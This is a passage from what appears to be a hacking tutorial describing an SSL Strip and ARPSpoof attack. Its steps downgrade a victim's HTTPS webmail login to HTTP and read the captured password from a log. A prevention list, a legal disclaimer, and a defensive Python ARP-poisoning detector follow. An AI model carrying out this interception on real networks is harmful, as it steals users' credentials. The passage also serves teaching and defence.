4. SSL Strip is now running and waiting for the victim to open an SSL URL such as (https://mail.google.com, https://mail.yahoo.com, https://mail.live.com, etc). As a victim I will try to open https://mail.live.com. When I open the page, I expect the URL to no longer be in secure socket layer. The URL changed into HTTP.
5. After SSL Strip has captured enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After you stop it, the whole network will be down and cannot be accessed for a while (it shouldn't take a long time); this can happen because ARPSpoof didn't automatically repopulate the ARP tables with the router's proper MAC address. Inside the SSL Strip folder there will be a new file created, "sslstrip.log", that stores all information that was captured over the HTTP protocol and even HTTPS. Just take a look at the file using your favorite text editor. The picture below is the content of my sslstrip.log that captured the victim's data when they opened https://mail.live.com. You can see the plain data of username and password there in the log.

Prevention of SSL Strip Attack:
1. Keep your eyes open.
2. Use SSH Tunneling.
3. If you are on a public network (internet cafe, unsecured hotspot, etc) minimalize logging into your personal accounts.

Don't get shocked if this application will insure you go to jail faster if you use it for an unintended purpose by law. Remember This! Don't use this for anything other than educational purposes or on a server with permission from a client.
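The ARP poisoning this attack depends on is visible from the victim side: the gateway's entry in the ARP cache suddenly carries another host's MAC address, and two IP addresses share one MAC. An added example, not part of the course, that parses /proc/net/arp-style snapshots and raises that alert; the two snapshots are constructed here, and the gateway and MAC addresses in them are assumed values.

```python
import re

# Constructed snapshot of /proc/net/arp on a victim host before the attack.
# Gateway 192.168.8.8 (as in the lesson) and the MAC addresses are assumed values.
BEFORE = """IP address       HW type     Flags       HW address            Mask     Device
192.168.8.8      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.8.94     0x1         0x2         66:77:88:99:aa:bb     *        eth0
"""
# The same cache after arpspoof has claimed the gateway: the gateway IP now maps to the
# MAC of 192.168.8.94, a hypothetical attacking host, so both IPs share one MAC.
AFTER = """IP address       HW type     Flags       HW address            Mask     Device
192.168.8.8      0x1         0x2         66:77:88:99:aa:bb     *        eth0
192.168.8.94     0x1         0x2         66:77:88:99:aa:bb     *        eth0
"""

# IP, HW type, flags, MAC, mask, device; only IP, MAC and device are kept
ROW = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+\S+\s+\S+\s+([0-9a-f:]{17})\s+\S+\s+(\S+)", re.I)


def parse_arp_table(text):
    """Return {ip: mac} from /proc/net/arp-style text; the header line is skipped."""
    table = {}
    for line in text.splitlines()[1:]:
        m = ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def check_gateway(gateway_ip, trusted_mac, table):
    """Alerts when the gateway's MAC differs from the one learned earlier,
    or when another host in the cache shares the gateway's current MAC."""
    trusted_mac = trusted_mac.lower()
    alerts = []
    current = table.get(gateway_ip)
    if current is None:
        return [f"gateway {gateway_ip} missing from the ARP table"]
    if current != trusted_mac:
        alerts.append(f"gateway {gateway_ip} MAC changed: {trusted_mac} -> {current}")
    sharers = sorted(ip for ip, mac in table.items() if mac == current and ip != gateway_ip)
    if sharers:
        alerts.append(f"gateway MAC {current} also claimed by {', '.join(sharers)}")
    return alerts


def compare_snapshots(gateway_ip, baseline_text, current_text):
    """Learn the gateway MAC from a baseline taken on a known-good network, then recheck."""
    baseline = parse_arp_table(baseline_text)
    trusted = baseline.get(gateway_ip)
    if trusted is None:
        return [f"gateway {gateway_ip} missing from the baseline"]
    return check_gateway(gateway_ip, trusted, parse_arp_table(current_text))


def read_live_table(path="/proc/net/arp"):
    """Read the kernel ARP cache on a Linux host (the constructed run above does not need it)."""
    with open(path, encoding="ascii") as fh:
        return parse_arp_table(fh.read())
```

Run the baseline on a network you trust; a MAC that changes or is shared afterwards is the moment to stop entering credentials, whatever the address bar says.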